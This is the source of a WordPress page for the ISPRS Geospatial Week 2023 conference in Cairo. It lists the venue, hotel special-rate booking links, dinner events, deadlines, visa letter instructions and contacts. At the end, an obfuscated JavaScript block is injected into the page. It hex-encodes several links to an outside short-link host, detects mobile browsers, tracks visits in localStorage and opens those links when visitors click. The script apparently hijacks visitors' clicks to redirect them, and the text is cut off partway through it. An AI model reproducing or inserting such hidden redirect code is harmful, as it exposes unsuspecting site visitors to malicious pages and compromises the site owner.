!important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 